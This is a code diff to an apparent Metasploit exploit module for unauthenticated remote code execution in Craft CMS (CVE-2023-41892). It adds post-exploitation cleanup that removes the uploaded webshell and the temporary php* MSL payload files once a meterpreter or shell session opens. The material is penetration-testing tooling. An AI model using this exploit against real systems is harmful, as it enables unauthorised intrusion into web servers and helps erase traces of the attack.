Second release with manual cleanup of php* files

modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb

@@ -237,6 +237,32 @@ def execute_command(cmd, _opts = {})
     })
   end
 
+  def on_new_session(session)
+    # cleanup webshell in DOCUMENT_ROOT
+    register_files_for_cleanup("#{@config['document_root']}/#{@webshell_name}")
+
+    # Imagick plugin generates a php<random chars> file with MSL code in the directory set by
+    # the PHP ini setting "upload_tmp_dir". This file gets executed to generate the webshell.
+    # A manual cleanup procedure is required to identify and remove the php* files when the session is established.
+    if session.type == 'meterpreter'
+      session.fs.dir.chdir(@config['upload_tmp_dir'].to_s)
+      clean_files = session.fs.dir.entries
+      unless clean_files.nil? || clean_files.empty?
+        clean_files.each do |f|
+          register_files_for_cleanup("#{@config['upload_tmp_dir']}/#{f}") if f.match(/php+/)
+        end
+      end
+    else
+      clean_files = session.shell_command_token("ls #{@config['upload_tmp_dir']}/php*")
+      unless clean_files.nil? || clean_files.empty?
+        clean_files.split(' ').each do |f|
+          register_files_for_cleanup(f.to_s)
+        end
+      end
+    end
+    super
+  end
+
   def check
     check_phpinfo
     return CheckCode::Appears unless @config['upload_tmp_dir'].nil? || @config['document_root'].nil?
@@ -249,7 +275,6 @@ def exploit
     check_phpinfo unless datastore['AutoCheck']
     fail_with(Failure::NotVulnerable, 'Could not get required phpinfo. System is likely patched.') if @config['upload_tmp_dir'].nil? || @config['document_root'].nil?
     fail_with(Failure::UnexpectedReply, "Webshell #{@webshell_name} upload failed.") unless upload_webshell
-    register_files_for_cleanup(@webshell_name.to_s)
 
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
     case target['Type']